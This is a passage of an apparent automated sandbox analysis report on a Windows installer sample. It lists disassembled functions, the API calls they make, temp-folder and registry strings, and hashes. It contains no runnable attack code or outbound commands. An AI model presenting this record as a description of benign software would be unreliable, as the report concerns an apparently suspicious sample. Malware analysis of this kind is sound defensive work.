                                                                                                                                                                                                                                • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405E0C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                                                                                                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 2659869361-3355392842
                                                                                                                                                                                                                                • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                                                                • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040304A
                                                                                                                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                                                                                                • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                                                                                                                                                                • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405F14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 3248276644-3355392842
                                                                                                                                                                                                                                • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                                                                                                                                                                • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405513 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00405542
                                                                                                                                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                                                                                                                                                                                                  • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                                                                                                                                                                • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040640B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,0042C248,00000000,?,?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,00406672,80000002), ref: 00406451
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,00000000,0042C248), ref: 0040645C
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\Stuffiness7.dat, xrefs: 00406412
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\Stuffiness7.dat
                                                                                                                                                                                                                                • API String ID: 3356406503-1966830035
                                                                                                                                                                                                                                • Opcode ID: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                                                                                                                                                                                                • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00403B57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,76F73420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00403B78
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 1100898210-3355392842
                                                                                                                                                                                                                                • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                                                                                                                                • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405E58 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(80000000,C:\Program Files (x86)\E6l40hhe,004030E9,C:\Program Files (x86)\E6l40hhe,C:\Program Files (x86)\E6l40hhe,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00405E5E
                                                                                                                                                                                                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Program Files (x86)\E6l40hhe,004030E9,C:\Program Files (x86)\E6l40hhe,C:\Program Files (x86)\E6l40hhe,00443800,00443800,80000000,00000003), ref: 00405E6E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Program Files (x86)\E6l40hhe, xrefs: 00405E58
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharPrevlstrlen
                                                                                                                                                                                                                                • String ID: C:\Program Files (x86)\E6l40hhe
                                                                                                                                                                                                                                • API String ID: 2709904686-3393615557
                                                                                                                                                                                                                                • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                                                                                • Instruction ID: d2786f61c86b799b8b6ecf14661ff9643eaf9d362a95097130d0805b1e4d2bc4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36D0A7B3410D20DAC3126718DC04DAF73ECFF6134074A442AF481A71A4D7785E8186ED
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405F92 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
                                                                                                                                                                                                                                • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 190613189-0
                                                                                                                                                                                                                                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                                                                • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                Function 0166F637 Relevance: 10.3, APIs: 1, Strings: 4, Instructions: 1575COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
